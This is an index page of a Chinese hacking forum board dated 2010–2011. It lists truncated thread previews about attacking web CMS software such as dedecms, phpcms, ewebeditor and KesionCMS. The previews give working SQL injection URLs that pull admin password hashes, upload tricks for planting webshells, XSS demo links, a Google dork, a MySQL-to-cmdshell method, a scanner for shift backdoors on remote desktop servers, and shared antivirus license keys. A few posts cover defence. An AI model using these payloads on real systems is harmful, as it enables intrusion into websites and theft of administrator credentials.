收藏本版 |訂閲

电脑病毒论坛 今日: 0|主題: 1421|排名: 14 

  • phpcms V9 BLind SQL 注入漏洞0day
      影响版本:phpcms v9 blind   官方网站:http://www.phpcms.cn   漏洞类型:SQL注入   漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。   google dork:inurl:"index.php?m=content+c=rss+catid=10"   exploit & p0c   [!] index.php?m=content&c=rss&catid=[valid catid]   Example p0c   [!] ht ...
    0142 女人是公主 发表于 2011-3-11 漏洞分析
  • ckeditor/DesignCms上传漏洞
      今天日站发现的....   http://www.xxx.net/manage/Modle/UploadFile/ListFiles.aspx 上传洞洞   上传后没改文件名!可以IIS解析   后面的事,你懂的~   有点像FCK ...   我晕了...这程式漏洞真多   刚又发现了...有点像shell的管理界面 可以修改 新建 等等功能~   http://www.xxx.com/manage/Modle/Templat ...
    077 文阁 发表于 2011-3-11 漏洞分析
  • DedeCmsV5.6 本地包含又一利用方式
      续本地包含   include/arc.datalist.class.php   $codefile = (isset($needCode) ? $needCode : $cfg_soft_lang);   if(file_exists(DEDEINC.'/code/datalist.'.$codefile.'.inc'))   {   require_once(DEDEINC.'/code/datalist.'.$codefile.'.inc');   }   包含这个文件即可包含 .inc 类型文件,   而 ...
    093 雅澜 发表于 2011-3-11 漏洞分析
  • 织梦管理系统后台查找
      有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。。   这个时候 大家可以尝试下在地址后面加上:/include/dialog/select_media.php?f=form1.murl   但不一定通杀。。  
    0106 运芳 发表于 2011-3-11 漏洞分析
  • EXCMS 0day (过程精彩)
      以下版本没测试 测试的是最新版本   在公布前几小时没有通知官方 ^_^ 哈哈   为什么说过程精彩呢? 看完就明白!   因为这个漏洞原因非一般! 同时映射出中国软件行业的悲哀!!!   经典对白 看代码   后台登录文件   adminModulesAuthIndex.php      if ( defined( "EXCMS" ) ) //在admin/index.php里有了 ...
    076 喜欢听青蛙和鸣 发表于 2011-3-11 漏洞分析
  • dedecms织梦 v5.5 两处跨站漏洞
      影响版本:   dedecms织梦5.5   漏洞描述:   demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=&ageNo=2demo2:http://www.dedecms.com/plus/list.php?tid=6&TotalResult=&nativeplace=0&infotype=0&keyw ...
    0119 烟酒人 发表于 2011-3-11 漏洞分析
  • dedecms 5.6的最新注入漏洞
      最新dedecms 5.6的注入代码:   http://www.dedecms.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1
    0111 一切反动派都是纸老虎 发表于 2011-3-11 漏洞分析
  • ecshop爆绝对路径的bug
      ecshop爆绝对路径的bug   网址如下"   http://www.zzfhw.com/ECShop/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php  
    050 妖比不上性感的骚 发表于 2011-3-11 漏洞分析
  • PHP漏洞全解
      PHP网页的安全性问题   针对PHP的网站主要存在下面几种攻击方式:   1.命令注入(Command Injection)   2.eval注入(Eval Injection)   3.客户端脚本攻击(script Insertion)   4.跨网站脚本攻击(Cross Site scripting, XSS)   5.SQL注入攻击(SQL injection)   6.跨网站请求伪造攻击(Cross Site ...
    052 天蘅 发表于 2011-3-11 漏洞分析
  • ewebeditor通杀鸡肋0day漏洞
    先访问这个地址 Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp 访问这个地址可以建立个A.ASP的文件夹…… 再用这个html代码上传。 <form action="http://www.zzfhw.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="m ...
    0126 时光囚徒 发表于 2011-3-11 漏洞分析
  • 织梦网官方(dedecms)爆路径最新漏洞
      首发:红科网安   作者:Amxking   漏洞程序:dedecms5.5   测试对象:织梦网CMS官方网站   提交时间:2010-03-17   漏洞类型:信息泄露   危险等级:低   漏洞描述:   dedecms 5.5程序泄露网站路径信息。     测试地址:   http://www.dedecms.com/plus/paycenter/alipay/return_url.php   ht ...
    084 陈海华 发表于 2011-3-11 漏洞分析
  • DISCUZ X1.5 本地文件包含漏洞说明
    config_global.php 复制代码代码如下:   $_config['cache']['type'] = ‘file’;   function cachedata($cachenames) {   ……   $isfilecache = getglobal(‘config/cache/type’) == ‘file’;   ……   if($isfilecache) {   $lostcaches = array( ...
    059 四宝之尊 发表于 2011-3-11 漏洞分析
  • 使用参数化查询防止SQL注入漏洞
    SQL注入的原理 以往在Web应用程序访问数据库时一般是采取拼接字符串的形式,比如登录的时候就是根据用户名和密码去查询: string sql = "SELECT TOP 1 * FROM [User] WHERE UserName = '" + userName + "' AND Password = '" + password + "'"; 其中userName和password两个变量的值是由用户输入的。在userName和password都 ...
    058 熊艳芬 发表于 2011-3-5 服务器安全
  • 如何打造自己的超级防火墙
    我们遇到的入侵方式大概包括了以下几种:   (1) 被他人盗取密码;   (2) 系统被木马攻击;   (3) 浏览网页时被恶意的java scrpit程序攻击;   (4) QQ被攻击或泄漏信息;   (5) 病毒感染;   (6) 系统存在漏洞使他人攻击自己。   (7) 骇客的恶意攻击。   下面我们就来看看通过什么样的手段来更有效的防范攻 ...
    072 您好花开富贵 发表于 2011-2-27 其他
  • 3389远程终端的SHIFT后门自动扫描[自动关闭错误连接]
    首先3389的SHIFT后门极少 其次大部分SHIFT后门都加密 所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受 需要用到的工具 roboclientsmclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d shift_backdoor.txt: job { connect("","","",1,1); sleep(2000); senddata("WM_KEYDOWN",16,2752513); senddat ...
    092 洪平水 发表于 2011-1-15 教程
  • 手工注入拿到管理员密码登陆后台 图文
    入侵是指未授权的非法进入,而安全检测是授权的检测!对自己的程序进行测试,当然是调试或者是安全检测了!这次就把自己对程序的测试过程发出来!因为是利用程序中的漏洞,在这利用的是SQL注入!我们要进行SQL注入!首先要找注入点了  我们要对这个程序进行测试!注入吗?要找注入点,我们找一篇文章  看到这个 ...
    056 吃瓜群众谨慎发言 发表于 2010-12-21 入侵防御
  • 麦咖啡8.5i企业服务器版免费下载
    麦咖啡8.5i大企业服务器版下载,可无限使用、在线更新。 McAfee一款不错的杀毒软件,是服务器上最好用,最安全的杀毒软件,尤其是其企业版的灵活得到了用户的好评,现在分享授权码。 复制代码代码如下: 2705522-NAI(大企业授权) 1759124-NAI(中小企业授权) 1346326-NAI McAfee Managed Virus Defense 1355415-NAI McAfee Ne ...
    0136 战斧汽车贴膜 发表于 2010-10-19 杀毒防毒
  • 通过MySQL系统得到cmdshell的方法与防范
    1、连接到对方MYSQL 服务器    mysql -u root -h 192.168.0.1    mysql.exe 这个程序在你安装了MYSQL的的BIN目录中 2、让我们来看看服务器中有些什么数据库    mysql>show databases;    MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。    3、让我们进入数据 ...
    097 渔童 发表于 2010-9-30 入侵防御
  • 科汛 KesionCMS 文件名解析漏洞
    SEBUG-ID:12478 SEBUG-Appdir:科汛(KesionCMS) 发布时间:2009-10-13 影响版本: KesionCMS V6 SP2漏洞描述: 科汛cms,eshop系统建站第一品牌.专业提供开源cms项目定制服务及名片系统,在线输出,在线印刷,广告制作,在线图文下单系统提供商。 在文件上传处理上存在问题。 上传的文件即在当前目录下,比如当前目录是”/u ...
    058 送六亚王钓鱼 发表于 2010-9-30 漏洞分析
  • KesionCMS(科讯)上传漏洞与防范方法
    首先找到使用科讯系统的网站,注册会员,然后输入KS_editor/selectupfiles, 打开后上传x.asp;x.jpg格式的图片文件,如果是iis6架设的站点,可直接拿到网站的Webshell。 注意上传的时候不要勾选“自动命名”的选项。 静流发现的。据说通杀。测试了一下貌似有些站点就算不勾选“自动命名”,上传后的文 ...
    098 临照无影 发表于 2010-9-30 漏洞分析
  • 下一頁 »

    快速發帖

    還可輸入 180 個字符
    您需要登錄後才可以發帖 登錄 | 立即注册

    本版積分規則

    圆梦公社,专注于为全球华人提供纯粹技术交流的地方,请勿发布任何政治及违法的言论。如有相关侵权、举报、投诉及建议等,请发 E-mail:dzh188@hotmail.com

    Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

    在本版发帖返回顶部